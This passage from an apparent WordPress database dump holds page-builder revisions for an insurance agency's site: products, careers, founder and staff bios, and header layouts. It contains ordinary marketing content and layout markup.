Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 22:10:31','2023-04-08 22:10:31','',528,'http://cmdev-site1.com/?p=897',0,'revision','',0),(898,1,'2023-04-08 22:14:53','2023-04-08 22:14:53','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_padding=\"20px|||||\" animation_style=\"flip\" animation_direction=\"right\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 22:14:53','2023-04-08 22:14:53','',26,'http://cmdev-site1.com/?p=898',0,'revision','',0),(899,1,'2023-04-08 22:14:54','2023-04-08 22:14:54','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" logo_width_tablet=\"75%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|tablet\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\" menu_font_last_edited=\"on|phone\" menu_text_color_tablet=\"\" menu_text_color_phone=\"\" menu_text_color_last_edited=\"on|phone\" background_layout_tablet=\"light\" background_layout_phone=\"light\" background_layout_last_edited=\"on|tablet\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" mobile_menu_text_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" custom_css_before_last_edited=\"on|phone\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 22:14:54','2023-04-08 22:14:54','',528,'http://cmdev-site1.com/?p=899',0,'revision','',0),(900,3,'2023-04-09 12:32:42','2023-04-09 12:32:42','','Page Header 2200x500','','inherit','open','closed','','page-header-2200x500','','','2023-04-09 12:32:42','2023-04-09 12:32:42','',0,'http://cmdev-site1.com/wp-content/uploads/2023/04/Page-Header-2200x500-1.jpg',0,'attachment','image/jpeg',0),(903,3,'2023-04-10 13:15:21','2023-04-10 13:15:21','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.4\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Page-Header-2200x500-1.jpg\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" title_text=\"Page Header 2200x500\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" logo_width_tablet=\"75%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|tablet\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\" menu_font_last_edited=\"on|phone\" menu_text_color_tablet=\"\" menu_text_color_phone=\"\" menu_text_color_last_edited=\"on|phone\" background_layout_tablet=\"light\" background_layout_phone=\"light\" background_layout_last_edited=\"on|tablet\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" mobile_menu_text_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover=\"#003372\" custom_css_before_last_edited=\"on|phone\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-10 13:15:21','2023-04-10 13:15:21','',528,'http://cmdev-site1.com/?p=903',0,'revision','',0),(909,3,'2023-04-11 21:39:18','2023-04-11 21:39:18','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Careers</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto|||false|false\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" width_tablet=\"\" width_phone=\"\" width_last_edited=\"on|phone\" module_alignment=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" module_alignment=\"center\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life are truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-11 21:39:18','2023-04-11 21:39:18','',38,'http://cmdev-site1.com/?p=909',0,'revision','',0),(910,3,'2023-04-11 21:40:22','2023-04-11 21:40:22','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Our Story</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Justin Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Owner/Founder</span></em></p>\n<p><span style=\"font-weight: 400;\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Financial Services Industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" title_text=\"Seth\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Since starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" title_text=\"Matthew Sutton\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" custom_padding=\"||52px|||\" global_colors_info=\"{}\"]<h3><b>Matthew Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" title_text=\"Andres Cano\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Andres Cano</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-11 21:40:22','2023-04-11 21:40:22','',702,'http://cmdev-site1.com/?p=910',0,'revision','',0),(908,3,'2023-04-11 21:38:14','2023-04-11 21:38:14','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" 